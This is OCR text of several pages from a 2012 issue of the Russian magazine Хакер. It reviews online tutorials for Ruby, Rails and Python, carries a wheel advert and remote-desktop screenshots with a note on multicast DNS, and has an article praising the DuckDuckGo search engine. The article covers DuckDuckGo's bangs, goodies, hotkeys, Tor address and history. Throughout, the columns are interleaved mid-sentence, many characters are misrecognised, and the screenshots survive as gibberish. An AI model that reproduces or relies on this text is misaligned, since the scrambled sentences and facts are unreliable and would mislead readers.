
знаешь, насколько вост р ебов анными сейчас

лифицироваться на более востребованное

экспертов по и нформационн ой безопасности :

на пр авление, то

к примеру, известный фреймворк для хакера

являются прогр амм и сты на

Ruby оп Rails.

За

Ruby

в связке с

Ruby

оп

Rails

грамот ными с n е циали ста ми , готовыми быстро

-совершенно точно очень неплохой вариант.

поднимат ь растущие веб-проекты, г о няют ся

И выучить его сейчас можно довольно быстро.

RUBYMONK

Ruby популярен

и среди

Metasploit !и в т ом чис ле все е го модули! на­ писаны им енно на Ruby.

предлагаются более сложные упраж нения.

Совершенно улетно реали зована проверка

выполненных заданий !код решения, есте­

rubymonk.com

___

ственно, надо набирать прямо в браузере,

TIWIRw:/yF'r1rr'erl8a!·•"':8f8Ctlve

Проект представляет собой интерактивную

а редактор даже поддержива ет подеветку

ЬOOkthalt\e'Piyaule&lnRuoy

книгу, состоящую из пятид есяти упражнений,

си нтаксиса!. Д ля каждого упражнения за даны

~~----­

позволяющих быстро пройтись по основам

контрольные точки, по которым проверяет-

Ruby.

Тебе говорят: << Ма ссив из элеме нт ов

соз дается так- п опробуй>>. И ты пробуешь.

ся правильнесть решения. Таким образом, в любой момент можно п онять, что именно н е

Далее объясняется что-то еще,- ты опять

нравится интерактивной системе, какой ре ­

же сразу проверяешь это в действии. Как

зультат должен быть на выходе, и где в твоем

только зна ни й становится достаточно, тебе

решении спряталась ошибка.

TRY RUBY

.....

.....

r.-"-'~illlmtt,.,..,_..,., J.""_

-а..и...r~-- tllaJ --Vw-'"'• ,./!J

вообще никогда не имел д ело с программиро­ ванием, t гу гuЬу будеттебе по зубам. Правда,

tryruby.org

в это м случае обучение, вероятно, зай мет чу ть больше времени. Всего нужно пройти восемь

_

Если у тебя был мало-мальский о пыт програм­

уроков и справиться с более ч ем пятьюдесят ью

......... ....... ........... ···- ,......._.......... _..._...._

мирования, то эта интерактивная абучалка

задания ми. Пр оект стал еще лучше после того,

""""''-"'"'-··-··..... ,..........,

буква льно за пятнадцать минут позволит тебе

как е г о взяла п од свое крыло уже упомя н утая

пройтись по базовым п он я ти ям языка

Ruby

и понять, что к чему. Впрочем, даже ес ли ты

ТНЕ INTRO ТО RAILS SCREENCAST 1 WISH 1HAD

выше школа

C<>de school.

у .... _

- · - - -" .. ,__

.oll•lw!ototn~

Теперь это практи­

чески идеальный реп е титор.

--

убойный скринкаст с говорящим на зван и ем

<< Скринкаст для чайников в

Rails ,

The lntro to Rails Screencast 1Wish 1Had

с которо­

го я хотел бы начать са м >> . В 40-минутном

blt.ly/zqLVPH

ролике в самой доходчивой форме рассказы­

вается, как исполь зова ть

со циируется с по пулярнейшим фреймв орком

Rails. После это го << Models>>, <<TDD >>, <<Act i ve R ecoгd>>, <<RSpec>>, <<СаруЬага>>, << Paг t ial s>> уже н е буд ут

для пос троения веб-приложений

пугать. Э т о не ед ин ственный скринкаст для

Ка к уже было отмечено, язык

Rails.

Rub y четко Ru by

ас ­

Оп

Последний п омо г взлететь не одному

слова

начинающих: немало видеоуроков для про­

старта п у из Силиконовой д о лины, в том

граммистов самого разного уровня можно

числе и Twitteг'y. Дж еффри Вэй- главный

найти на другом профильнам проекте­

редактор сервиса

гailscast s.com.

tutsplus.com-

записал

RAILS FOR ZOMBIES

Downloвd

"""""'""'"'

Записанные на неизменно высоком уровне уроки, приправленные здоровой дозой

railsforzombles.org

юмора, сопровождаются упражнениями,

состав л енными и з си т уа ций , с которыми

После того lи только после тогоiJ как у тебя

каждый день встр ечаются программи сты на

будут необходимые знания

<<ре л ьсах>>. Е сли э т ого курса т ебе окажется

Rai ls

и некоторый

о пыт в созда ни и веб- прил оже ни й, обязатель­

мало, то у авторов есть продолжение

но нужно пройти бесплатный курс <<Ре ль с ы

fог ZomЬies

для зомби>> от все той же школы

только за денежку.

Х АКЕР

c<>de school .

2>>,

<< Rails

Atutor1attot •pploa.tюn

Ruby

mf:'ntv.sн\g

оп

Rails

но его можно пройти уже

033

04/159/ 2012

www.epidemz.net


PCZONE

Python Python- один

О

из nоnулярнейших языков

python ·

максимально быстрого nрототиnирования

бывала ситуация, когда нужно было что-то

nрограммирования среди с n ециа ли стов по

сложных информационных систем. Вnрочем,

оnтим и зировать, и каждый раз знания языка

информаЦионной безоnасности. Огромное ко­

nрототиnом дело часто не ограничивае тся:

оказывались очень nолезны.

личество nодключаемых библиотек nозволяет

найдется немало nроектов, код которых на­

Б о лее того,

быстро nисать сложные сценарии и всnомога­

nисан на

серьезные nриложения в качестве скриnтоео­

Python,

и которые выдерживаю т

Python

часто встраивают во многие

тельные nриложения. Многие nрофи вообщ е

огромные нагрузки. Изучить этот язык можн о

го языка, чтобы иметь богатые возможности

считают

даже nросто для себя: у меня десятки раз

для создания сценариев.

Python

идеальным инструментом для

ПОПРОБУЙ PYТHONI

надо даже устанавливать интерnретато р. Это

--

очень удобно: любой nрив еденный nример

trypython .org

можно тут же nоnробовать в действии. Однако

Лучший сnособ быстрого старта- nоnр о­

Python

бовать онлайн-обучалку

за nравильнопью действий и не nредлаг ает

TN.......,P... ...

на э т ом интерактивность заканчивается : Т гу

Python.

П о инте­

задачки для nроверки знан ий . Весь курс со­

анало гичным nроектам для

не менее, nозволяет nройти базовый курс

стоит из семи частей !nять по Python и две по lг on P y thonl. Забавно, что сам сервис написан

обучения nрямо в браузе ре. На ком nьютер не

на S il veгlight'e.

JS и Ruby,

но, тем

ОНЛАЙН - РЕПЕТИТОР PYTHON

.......,,..,,_,..

.... .. ........ ..

тривать значения разных структур данных

~

lпеременных, объектов в куче, фреймов

скольких заранее заготовленных сниппетов,

курса по nрограммированию в известной

взятых из учебной программы

американской кузнице nрограммистов М ас­

Забавно, что здесь есть не с колько зада чек,

сачусетского технологического института.

которые nредлагают соискателям на долж­

Его идея заключается в том, ч тобы визуали­

ность программистов. С решениями. Сервис

Python

в

MIT.

~

_.... ___

•••

,,. ~,н,.,

.. , .......... ""''-'"' ···01 ,_

.. ........"'

<oot .. l·(t•~o·-··

'"

,,. ... ,.. -·-•-.cl

...... a ••., .. ao< J

.,.._

"• ·•r:•

••":[::,;

1"'........ 011

.. , ...,,.,._,,.,щ, ,н....,.м

lo• 1 '" tt' oo !l. lo•IAJI

набранный прямо в браузере, или один из не­

Забавный сервис был разра ботан в рамках

. . .-.. . . .

_

, .. ..,,....,, .....-.•.................. _ ...... .................................

1

:,:·~: ~:::.::;;-; .;с•

стэкаl. Это может быть произвольный код,

оn 1i n е pytho ntutor.com

~

=~-·-·

никак не nроверяет тв о й код, не с ледит

рактивности сервис си ль но nроигрывает

- ___

_". ... ,_..ooo"•••-N< ........ - .......... ,.,,...llt ......... ......... ,.-.;.......... ..... ..... "-'to<.,..

·-

- / )ffl5;lt710

·~~~~

IAitl • ..,,

.............

1

.. "

:; :;~~:. :el:•. :c.:. .:: ·" '· '''

зировать выполнения сце нар иев, написанных

можно было бы назвать онлайн-отладчиком,

в озможности подключения модулей, выnол­

на Pyth oп, позволяя пошагово выполня ть их

однако для выполнения сложных сценар иев

нения 1 / 0-операций и так далее. Кстати, код

!вперед-назад! и на каждом шаге просма-

использовать его уже нельзя из-за отсутствия

проекта nолностью открыт.

У РОКИ

PYTHON

ОТ

GOOGLE

должности разработчиков!. Теnерь этот курс

~('l< o~k

rl

GoogloCodiUroiYe!aity

nолностью открыт и бесnлатен. Он включает

cod е .goog le .com/ed u/la ng ua ges/go og 1е­ python-class/i ndex.html

в себя пошаговые мануалы , видео лекций,

а также много уnражнений для тренировки и закреnления материалов. Первые занятия

Google

давно славится тем, что активно ис­

nользует у себя

Python.

В комnании есть даже

касаются базовых nонятий в Python !вроде

строк и списков!, далее- nоследовательно

___.._____ ___.. --··"'.. ___ _ - ·-----------·----·--·-----------·--· ·~

,

",

сnециальный курс, nредназначенный для

освещается разработка nолноценных nри­

людей, у которых nока мало оnыта в nрограм­

ложений, работающих с файлами, nроцессами

в

мировании !естестве нн о, о н и не работают на

и НТТР-соединениями. Над о сказать, что

сценарию и умещается в два дня.

Google

этот курс проходит по и нт енсивному

ПОПРОБОВАТЬ ТЕХНОЛОГИЮ! Интерактивные обучалки, nозволяющие

к nримеру, nознакомиться с набирающими

быстро nрочувствовать новую технологию,

оборот функциональными языками

nоявляются, как грибы nосле до ж дя . Ни же я

nрограммирования или новомодными

nривожу е ще несколько nодобны х nроектов ,

базами данных .

кото ры е не вошли в сегодняшний обзор,

• Haskell: tгyhaskell . org ; • Scala: simplyscala.com;

но будут очень nол езн ы , если ты хоче шь,

NoSQL

• Eгlang : tryerlang.org; • Cloju г e: try-clo jure.org; • MongoDb: t ry.monqodb.orq; • RedisDb : tr .redis-db.com · • С#: Ьit.ly/A4HR9m; • Язык за nро сов SQL: sql-ex.ru .

ХАКЕР

03~

www.epidemz.net

04/159/2012


MUGELLO - HYPER SILVER

VAIRANO

INDY 500

SILVERSTONE

NARDO

ROTARY FORGED WHEELS

MALLORY

CARTHAGE

VALENCIA

SEPANG

ZOLDER

CADWELL

NURBURGR ING RF

INTERLAGOS RF

МАХ

BROOKLANDS

STOWE

LONDR INA

JARAMA

SNEПERTON

DONIN GTON

WILLOW

STRIP

Visit our website to view the complete line of TSW Wheels

TSW is dedicated to being the world 's premium provider of staggered wheel applications and has more one-piece staggered wheel sizes than any other wheel brand in the world.

www.epidemz.net

Реклама


www.epidemz.net


Открыть Заnуск от 11t·18H~1.,

Configur ation

,

Start Application Session

Open in Window Switch

Start Desktop Session user@testpc rl·lain \lo/i ndO'Л'S Displa':/

Compress to "opera .rar" and email Закреп~п ь в t·1еню "П~'ск"

Configure От прав11Ть

DisaЫe

Выре за ть Кот1ровать

Discoпnect

Start Application Start Desktop

Соз дать ::1рлык Уда Л11ТЬ

Пере11t•1ен ова ть

Open File

r1Je ~\'

Connection

ant@ant-vb fYiain Unix Display

www.epidemz.net

"

start Applteat10n

-

Start Oesktop

~


Нost

Multicast DNS lmDNS) является способом

<< представляя » себя другим участникам сети .

Username

использования привычных программных

Таким образом все машины в сети обновляют

Password

интерфейсов

свой mDNS-кэш и получают информацию и о

DNS внебольши х сетях, где

нет необ х одимости в обычном DNS-cepвepe.

новых хостах/сервисах . Чтобы аннулировать

Проще говоря , использование

свое « nредставление >> !наnример, в случае

mDNS

позволяет клиенту оnределить IР-адрес

выключения машины) хост должен отnравить

х оста без помощи централизованного

геsроnsе - пак е т с

DNS-

TTL

использует зарезервированную з ону

хост, посылает широковещат е льный

Протокол

зaпpoc . Соответствующий хост отвечает на этот заnрос широков е щат е льным ответом ,

mDNS <<. local >>.

mDNS исnользуют такие системы обнаружения сервисов как Bonjouг IApple) и Avahi ILinux) .

SSH

v on port 22

О Verify Identification

=О . По умолчанию

cepвepa . Машина, ищущая конкретный

mDNS-

Via

192. 168.0.4

И!т

) ( Cancel

Р Connect

Ручное добавление сервера для nодключения

ХАКЕР

038

www.epidemz.net

04/159/2012


!Url~

..... ,~

Co•••••:low....ouroi!J

'1J

1!\. -

Connected to server 'testpc' Successfulty logged in as user on testpc. Тhere 1s one other user connected user Тhere 1s one !1ve sesSion: Ma1n W1ndows D1sp!ay

www.epidemz.net

8


PCZONE

Мария « Mifrill» Нефедова lmifri llliJreal.xake p.rul

~~GOOGLE v

ЭАТО&ОИ.

НЕТ>>

Mbl 10 ПРИЧИН

ОБРАТИТЬ ВНИМАНИЕ НА ПОИСКОВИК DUCKDUCKGO.COM Каким поисковиком ты обычно пользуешься?

Google

или

Яндексом? Или, быть может, ты по какой-то причине юзаешь

Biпg? А ведь инструментов для поиска винтернетегораздо

больше, и помимо закрыты х коммерчески х поисковиков,

в

первый раз о таком с лышишь? Я

начинает напрягать. Не надо нам навязывать

тоже. Но ведь так было когда-то и с

G+- мы

Google. DuckDuckGo- это

ную сеть от Google или нет.

гибридный

гикавекие альтернативы . Одна из таки х альтернатив-

OuckGo.com .

Duck-

DuckDuckGo в свою

поисковик , главные черты которого- класс­

очередь является классическим поисковиком,

ный поиск , отсутствие поискового спама,

каким был

минимальное количество рекламы [ее можно

развития . И что здорово, - он отлично ищет

Google в самом

начале своего

полностью отключить в настройках) и щепе­

информацию! Правда, пока только на англи й­

тильное отношение к модному на западе слову

ском языке: с русскоязычным сегментом сети

«pг i vacy>>:

у него явные проблемы. П оисковик уже давно

DuckDuckGo

не следит за пользова­

телями, сохраняя их анонимность . Мы нашли

приглянулся гикам из Силиконовой долины .

десять причин, почему его стоит по меньшей

В прошлом году аудитория составляла всего

мере взять на вооружение.

200 000

шпионящи х за каждым твоим шагом, существуют отличные

и сами решим , использовать социаль ­

человек в день, а в этом сервис уже

перешагнул отметку в

1

1 000 000

посетителей

Это просто поиск . Давно прошли те

ежедневно и, если верить статистике

времена, когда

[ du c kdu ckg o . co m / tгa f f i c . ht m l ), эта цифра

Google был

просто

поисковиком, а на << чистой >> странице

продолжает расти. А с ноября

2011

года

поиска. Сейчас же нас пичкают рекламой

DuckDuckGo стал Linux Mint 12. Это,

и дополнительными сервисам и. Взятый

популярный десктопный дистрибутив

поисковиком nуть на социализациютоже

сегодняшний день .

выдачи аскетично выводились рез у льтаты

поисковиком по умолчанию на минуточку, самый

ХАКЕР

www.epidemz.net

Linux

на

04 /159/ 2012


<<Google следит за тобой. М ы- нет»

о

DuckDuck Go

Google tracks you. We don't.

About

Search better at

W11fo1mortin~IIN11~

DuckDuck Go

Главная страница

DuckDuckGo аскетична ,

чиста и навевает

мысли о Google.

Во т так продвиг а л с вой пои сковик В айнберг. Этот билборд

Поис ковик уже сегодня может по х вастаться тем , что был

висел в Сан·Франциско, и Гэб ри елу это об х одилось в

удостоен внимания кр у пных изданий .

7 000

$в месяц.

Никакой слежки за пользователями.

ци ю 5М5 и типы зво н ков. Страшно? А ведь это

этого пока небольшого, но гордого поис­

Е с ли ве ри ть соз д а т ел ям, т о з д есь

даже не самое скверное. Google может собирать

ковика, в красках повествующий об истории

цар и тпо лн ая а н о нимн ост ь . Н аз в а ни е

не только историют в оих звонков, он также

поиска в целом и о том, почему сбор данных

этой стат ь и взято из глав н о г о лозу н га п роек т а:

ч итаеттвою переписку и знает все о твоих пере­

о пользователях- это очень и очень плохо .

2

<<Google следит за тобой. М ы- нет>>. Замечал

движениях с точностьюдо пары метров за

ли ты, как реклама в поисковиках умело

последнюю пару лет. Благодаря синхронизиро·

подстра ив ае т ся по д т е запросы, кото ры е т ы

в ан н ым с Gmail контактам знаеттвоих друзей

делал ранее? Н а сай т е ht t p : Udoпttгa c k . us

и знакомых, а основываясь на подписках

приво д ится отли ч ная д е м о н с т рац ия того, ка к

и запросах к поис к у - знает о твоих интересах.

не и звестно, но сейчас результаты поиска

это п роисхо д и т . Ситуация ста л а особе нн о

А еще знае т о твоих покупках и храниттвои

удивляют своей чистотой и точностью. На

актуал ь ной после того, как Google смен и л свою

документы в Google Docs.

сегодня можно сказать точно, что 5ЕО­

политику ко н фи д е н циал ь нос т и. Скажи ч естно,

DuckDuckGo не хранит IР-адреса , не ведет ло­

оптимизаторам DuckDuckGo пока по барабану,

ты читал новое соглашен и е о ко н фиде н ц и ал ь ­

гов пользовательской информации и исполь­

и это рад ует.

ности? А меж д у т ем с 1 ма рт а 2012 оно вс т у п ило

зуеткукитолько тогда, ко гда это действи ­

в силу. Согласно неко т о р ым п у н к т а м, Google

тельно необходи м о. Соз д атель поисковика

в открытую декла р и р ует сбо р телефо н ных

заявляет: <<Duck Duck Go не собирает никакую

логов, то есть номе р а телефонов, номера

личную информацию пользователей и не

телефоно в вы зы в аем ы х або н ен т о в , но м ера д ля

д елится ей. Вот и вся наша политика конфи·

пятидесяти разных источников, включая

переа др есации, д ату и врем я з в о нк ов,

денциальности>> . П о адресу duckduckgo.com /

Yahoo! 5еагсh 8 055, Wikiped ia, Wolfгam Alpha

дл ит ельнос т ь з в о н ков, мар шр у т ную и нф ор м а-

pгivacy.html т ы найдешь настоящий манифест

и собственного поисков о го робота. Одним

Помимо п е речисл ен ног о наличествуют

т о чное время в любом городе мира и так далее .

мн огочислен ны е пол езности, связанные

Например , ответом на зап ро с << агеа of china >>

СИСТЕМА

з

'

В DuckDuckGo практически отсутствует

спам , которым забиты все коммерче­ ские поисковики. Надолго ли это, увы,

Гибридный поисковик дает больше результатов . Результатыпоиска

DuckDuckGo агрегируются из

GOODIES

Чтобы лучше понять одну из самых прог р есс ивны х фишек пои ско вика-

goodie s -

пре дл а гаем т ебе несколько примеров . Начнем

с математическими выражениями ,

[площадь Китая! будет точное, как в апт е к е:

с технических .

различными формулами, ко нвер тацией, трансформацией и так дал ее, дал ее , дал ее .

<< 3.705 mil l ion mi2 [square m i lesl [world ran k : 4thl , assumiпg china is а соuпtгу >> [3.705 млн .

свой IP :1 . Е с ли же свой собственный

Та кже nоддерживается немало так н азываем ы х

квадратных миль [4-я по величине стран а

IР ' шник тебя не интересует, можешь ввести

казуальных

Запрос

<<ip address>> поможет теб е узнать

в поисков у ю строку любой уже и з вестный

в мире! , ес ли под с ловом << Китай » имелась

goodies:

П о и ск по д атам и фактам. Спр оси у

Du ck·

в виду страна! .

Du ckGo: << deat h date of li nco ln >> [дата смер ти

Реализован поиск п о различным 10, б у дь

сообщит теб е , к какой географич еской точке

Лин ко льна !, и вверху страницы nоисковой

это трекинг-номер п ос ылки [вводишь

IP от но си т ся, а также пока жет ее на ка рте: << 64.2 07.122 .151 is in : Cheyenпe, W yomi пg , Uпited States [8200 21 >>. Для чего нужны goodi es useгag e nt , whois

выдачи ты уви д ишь строку << А пswег:

номер отправл е ния в строку поиск а

Saturday, Apгil 15, 1865 >> [Ответ: суббота, 15 апреля, 18651 . Конечно, есть в Du ck Du ck Go конвертер

и про с то нажима е шь Go! , очень у добно! ,

и им подобны е, объяснять, над еюсь, не

ра зличны х величин и калькулятор , как же

друго е .

нужно.

без них?

Запрос вида

Имеется множество г е ографи ческих

а дрес , скажем ,

64.207.122 .151 , и Du ck DuckGo

межд у народный с танд а ртный номер книги или

ISBN , телефон и многое , много е

Рандомные goodies особенно забавны .

Запрос << heads о г tails >> [орел ли решкаl­

<< U+0 153>> даст ответ: <<с hагасt ег 339 : о е - Latin s mallligatuгe о е; Unicode U+015 3; Decimal = 339 ; HTML = œ>> .

ies , а также goodies , связа н ны х со временем

н е что иное , как во з можность подбро с ить

и часовыми поя сам и . Кстати, поискови к

виртуа льн ую монетку . А ведь е щ е есть

Для генерации паралей и ключ е вы х фраз

польз уе тся картографическим сервисом

гandom numb eг, гoll die, гando m woгd и даже

OpenStreetMap .

сакрамента льно е- this о г that о г nоп е . Для

=

=

используй << p asswoг d

* woг d s >> ,

гд е • -

* strong >> и « passphгase

любо е цифрово е з нач ение.

Так же можно ге н е рировать uuid, guid .

good-

Возмо жен поиск места на карте по заданны м

х ардкорщиков предлагается вари а нт гo ll

коо рдин атам и по адресам , можно у знать

3d1 2 + 4.

ХАКЕР 04/159/2012

www.epidemz.net


PCZONE словом,DuсkDuсkGо--своеобразная

список Ьапg ' ов доступен здесь: duckduckgo.

Впрочем , нужно заметить, что в случае

оппозиция

com / bang . htm l lпpeдyп режда е м-- он огромен).

формулировки запросов на русском языке поля

Google

и всем коммерческим

<< о тв ет >> ты , скорее всего, не увидишь. У Wolfгam

поисковикам в целом, которая просто не могла

рано или поздно не появиться. Отдельно стоит рассказатьпроiЬапg.Даннаякоманда

Моментальный отве т. Когда в поис-

5

ковике можно набрать <<гап dоm

конкретный товар на <<Амазоне >>. Допу стим, это

triaпgle 1.5 2 3.2>> lпериметртреугольника со с торонами 1.5, 2, 3.2), <<md5 this>> !посчитать md5-хэш для слова <<this>>l и тут же получить

Скажем, тЕ!бе нужно найти какой-либо

к которомуобращается

DuckDuckGo,

с великим и могучим пока не слишком хорошо.

пumЬег>> !случайное число!, <<peгimeteг

позволяет напрямую обращаться к другим пои сковым машинам и к сотням сайтов.

Alpha,

6

поисковика ты можешьлегко отключить показ рекламы, задать

регион, включить

HTTPS по умолча нию ,

часы. Наб ери в поисковой строке « lam azoп

ответ-- это называется

watch >> !или просто «la watch>>), и автоматиче­

самых убойных фишек поисковика, и таких

у казать параметры открытия ссылок и даже

ски попадешь на amazoп . com, в уже готовую

goodies действительно мн о г о -- как техниче­

на с троить внешний вид

поисковую подборкус часами. Благодаря этой

ских и математико-прогер с к их , так и казуаль­

каждый аспект поведения поисковика можно

команде можно легко искать на

ных ! подробнее читай во вр езке ). К слову,

оптимизироватьдля себя, и это приятно.

ltwitteг,

lwikipedia,

lyoutube ,

в благах, репазитариях и на

goodies.

Это одна из

Гибкая настройка . В настройка х

Практически

поискови к по многим вопр оса м с веряется

сотнях дру г их ресурсов. Кстати, также

с Wolfгam

работаютсокращения:

вычислительных алгоритм о в . Благодаряэтому

'g lgoogle), lj limages), lyt

DDG.

Alpha --базой зн а ни й

и набором

Система горячих клавиш . Плох тот

7

ресурс, который в наши дни не

lyoutubel, lwiki и так далее. Дополнять список

есть возможность ввести в с троку конкретный

Ьапg'ов могут и сами пользователи, для э т ого

вопрос и получить на него к о нкр е тный ответ

с этим полный порядок: общаться с сайтом

достаточно заполнить простую форму. Полн ый

прямо на странице, не прох о д я п о с сылкам.

можно вообще без и с пользования мыши или

-

Onlmt Servrces

!s1mplyh~red

о

DuckDuckGo

......

Google: !gaccess !gau !gbk !gЬiogs !gbooks (!gb) !gcache !gcal !gde !gdocs (!gd) !gfюance (!gf! stock) !gg roups (!gg) !g1mages (!91 !g1m) !glatest (!gweek !gmonth !gday !g24 !gyear) !gl1nk !glocal! gmail !gmaps (!gm) !gmusiC !gnews (!gn !gnde) !gnz !googleuk (!guk) !gpat !gphotos (!gp) !greader (! gr) !grelated !gscholar (!gsc) !gshoppюg (!gs) !gtranslate (!gt !gturl) !gtrends !gus !g1•ideos (!gv)! gv1ewer (!gvle\V) !gwp !gv-pde !lmgtfy !dw !gas !gbm !gl !gmob !google (!g !gssl) !gplus !gplusp Jobs: !caree rbuilder !jobs !lmkup !monster !reed

поддерживает хоткеи. У

(!sh)

1 l.optop

Maps: !arcg1s !bюgmaps (!bn1aps) !n1apqt1est !openstreetmap (!openstreet !osm) !zemiJel•ld !zun11 Scarch: !bing (!Ь) !Ьiekko !ddg !dogp1le !ecos1a !entire1veb !everyciiCk !goosh !kazau !mamma! myallsearch !redz !seznam !smallsafaГI !spez,fy !start !startpage !swagbucks !у1рру !ask !exalead! fluid1nfo !fuu !gЫast !geega1n !giГ !karnыdecay !ka)•ak !koders !metacrawler !sp !unscatter !1vf1 !yahoo (!у !)•jp) !yandex (!уа !yaen !)•andexm) !)•eah\vay

Р ек л ама в

Du ckDuc kGo. Лег к о отключается

в настройках .

Scarch ( DDG): !anyr !help !safeoff

19460

Computing Jnfo ip address

Scarch (non ·US): !naJdi !soso !)•andex !youdao !ba1du !eks1sozluk !gnfr !opt1mot !)'IIV

map 19460

64.207.122.151

Grography

Scorch

( Р2Р ) : !)•асу (!рее г)

з

!seeks !xdcc

ames st., 02142

useragent

37.771008, ·122.41175

Scarch (Privote): !scroogle (!s) !1xqu1ck

о

populat•on of metro at

Scorch (Rcal ·time): !kurrently !lavva !oneriot !topS)' !evГI !tawlk Social: !tw1tter (!hv !tweet) !123people (!123р) !43thlngs !d1aspora !dmoz !facebook (!fb) !flattr! fonplus !fotolog !foursquare !fГiendster !ggroups !grepl1n !hiS !1dent1Ca !Je ICk !l1nked1n (!li) !myspace! г !shoutltout! veetgrid !\Vink !xanga

whois duckduckgo.con ~о Ylёl 1NhoisAPI • 368798

cap1tal of ch1le

golden ratio 5:?

elevat•on of salt lake ci

U+ 4034

area of chma

unicode ·

distance philly to lond<

Sociol (intl): !gulesider !orkut !skyrock !wleOIVIe Sociol no1vs/links: !del~eious !digg !dllgo !historious !jetsl1de !meneame !metaf1lter (!mefl) !ne\VSI'Ine! pastebln !pinboard (!рЬ) !redd~ !searchyc (!newsyc !hn !hackerne1vs !ус) !stumЫeupon (!stumЬie)! subredd1t !subreddit !thefullwiki (!fullwiki) !wikinews !wykop !xmarks Tools: !ЬiЬisrv !bugmenot (!login) !eggtimer !freenode !geocaching (!geocache) !geonames !gmane! gmap !gookokugo !gopher !1d1oms !kotobank !linguee !local !map !markma1l !oopon !pgp !proxy !qr! random !Гipestat !tюyurl !tld !trademarks !tz !val1date !v1ewpdf !yubnub

1Z0884XV0399906189 9780061353246

1g8gg3Sm1g7123 10 1 ,g

Tools (U RLs): !013 !cache (!cached) !downfor (!updown) !1sgd !1sup (!is1tdown) !longurl !vgd !1vayback (! archive !archived) !weboftrust (!1vot !m)'"Ot) !yinl1nks

e>duckduckgo

Tracking: !capost !dhl !dhlde !dhlgn1 !fedex !1ps !lasersh1p (!laser) !ontrac !package !purolator !sfs !tnt! track !ups !usps

Rt~ndom

newsnow !nzbmatrix (!nzb) !nzbs !reuters !ynews Broadcast: !abcne1vs

!ЬЬс !сЬс

guid epoch 3:38:34 Р М Е

http://Wolframalpha.co g

~ ~

Formult~s

vo lume of а sphere area of

а

trapezoid

yes or no

!cbsnews !cnn !foxnews !msnbc !npr !pbs

)1)

roll die

International: !globeandma1l !globo !heise !lntaiJazeera !locita !redtram !smh !sunt1mes !thereg1ster! thestar

throw dice

Mogazinc: !ch1lango !csmon1tor !econon11St !newsweek !newyorker !roll1ngstone !salon !slate (!slatefr)! telegraph !thenation

roll 3d1 2 + 4

И х д е йствит е льно ОЧЕНЬ много .

Ph ysic:~l Prop~rt i~s

heads or ta1ls this or that or non e

!bang.

uuid

3/15/20 11

random word 7·9

Business: !Ьiznar !Ьioomberg !business1veek !cnbc !fool !forbes !ft !mormngstar !msq !wsj !yfinance (!

Примерно сот а я часть шорткатов

reg exp /(.')/ ddg

random number

random word

Aggregators: !aljazeera ! ар !Ьinsearch !Ьiogs !Ьiogspot !bne1vs !cdt !kickne\Vs !news (!n) !newsmax!

~

pa ss phrase 4 words

12343435 time

ran d 1 10

News

~

(323) 319-6 185

r: duckduckgo v•a tagdef

Tools (fundro ising): !ind1egogo !kickstarter !rockethub

Computing Tools password 15 strong

IDs

density of the earth mass of jupiter gravitatio nal consta nt

throw s diCe

circumferen ce of the

www.epidemz.net

е. ~

radius of the moon

Н ек оторы е вариации

goodie s.

ХАКЕР

042

~

Si010

04 / 159/ 20 12


« Google сле ди т за тобой . Мы - нет>>

тачпада. Н иже - маленькая подсказка.

8

Передвижение по сайту :

Работает по защищенным протоко­

лам . У Du ck DuckGo есть короткое

доменное имя ht t p:U ddg .gg [это, к слову, на 4 с имвола короче, чем goo gle.

1' или j - следующий результат; -J., или k - предыдущий результат;

1или h- к поисковой строке; esc- выйти из поисковой строки; t-наверх;

m- к первому результату; 1 или 1-открыть выпадающее меню lb aпg.

Много дополнительных плюшек .

1Q Гики любят

Du ckDuckGo,

поэтому нет

ничего у дивит ель ного в п о явлении

вспомо г ательных инструментов, к оторые

com: l, которое редиректит посетителя на за щищ е нную SS L- вepcи ю сайта - https:// duckduckgo.com.

удобнее. Уже сейчас ес т ь спе циальные

П оисковиком можно пользоваться через Тог.

[другие в разработке!. Поиск м ожно вст роить

Адрес внутри сети - 3g2upl4p q 6kufc4m.oпioп.

п рямо в систе м у с помощью проектов вро д е

м огу т сде лать работу с поисковиком еще мобильные приложения для Aпdг o id и iOS

M ultiSeekeг [ bit. l y/d hЫV F I. Также есть

Открытые результаты: Епtег или 1 или о- открыть подсвеченный

9

результат ил и сразу открыть самый первый;

Ctгi/Cmd+Eпteг - открыть результат на фоно­

DDG можно использовать как прокси.

н есколько ад дон ов для популярных браузе ­

позволяе т зайти на любой сайт через

ров. Создатели даж е подняли чатбота [ye.gg/ chatbo tl , который р або т ает через ХМРР

Команда« !ргоху адрес-сай та>>

[Jabbeг l . Результаты можно получить

вой вкладке;

прокси. Для этой цели DuckDuckGo использу ­

d- поиск по конкретному сайту [который вы­ д е лен в результатах!.

ет различные беспла тны е прокси [что, пр авда,

моментально , отправив сооб щ е н ие на а др ес

плохо сказывается на скорости!.

imraddg.gg. ::x:::

РЕТРОСПЕКТИВА принимает. << Это было бы неправильно , в е дь

и доступна любому желающему на

энтузиас та Гэбриела Вайнберга . Лишь

мы некоммерч еская компания> >, - поясняется

lgithub.com/duckduckg о ] .

после получения инвестиций у поисковика

на сайте. Вместо dопаtе 'о в пользоват е лям

Откуда взялось эт о дурацкое название ? Оно

появилось не ско лько постоянны х сотрудников

предлагают активнее нести информ а цию

было выбрано практически случайно . В одном

и собственный офис в американском городе

о

из интервью Гэбриел поя с нил : << На са мом деле

DuckDuckGo-

проект одного единственного

GitHub

техноло гич еско го института IMITI . Поисковик

Du ck DuckGo людям. DuckDuckGo написан на Регl и Ja vaScг ipt с использованием библиотеки YUI. Для

для н е го- дал е ко не первый проект. Его

обслуживания ог ромного колич ес тв а

Во зм ожно, это связано с п о п улярной в США

со ци а льн ую сеть

клиентов используется связка пgiпх ,

д етск ой игрой под на званием

Паоли . Гэбриел- выходец из Массачусетског о

в один прекрасный день оно просто выскочило у меня в голове , и просто мне понравилось >>.

Th e Name s Databa se купила ком пания Uпited Dпliпe за 10 000 000 долларов С ША . Из начально Du ck DuckGo самостоятельно

50

финансировался лично Вайнбергом , но сейчас

собственные сервера, так и мощности Ama zoп

предлагает использ овать

су щ ес твует также и за счет небольшага

ЕС2 . Для х ранения данны х используются

« подакать~еслитранслитерироватьэто

Fa stCG I

и

memcached ,

запущенные FгееВ-

Goose >> .

глаголу << пог у глить >> IGoogle itl, Вайнберг

и Ubuпtu. При этом использ уютс я как

количества рекламы !которую , напоминаем,

Postgг e SOL+bu caг do, СОВ , Solг, BeгkelyDB,

можно отключить] . Пожертвований проект н е

Ча сть исходного кода

Du ck Du ckGo

<< Duck Duck

Кстати , в качестве альтер нативы

53 .

открыта

<< Duck itl,, -

то ес ть

на р у сский, или << поуткать>>, если дословно

п е р е вести

:1.

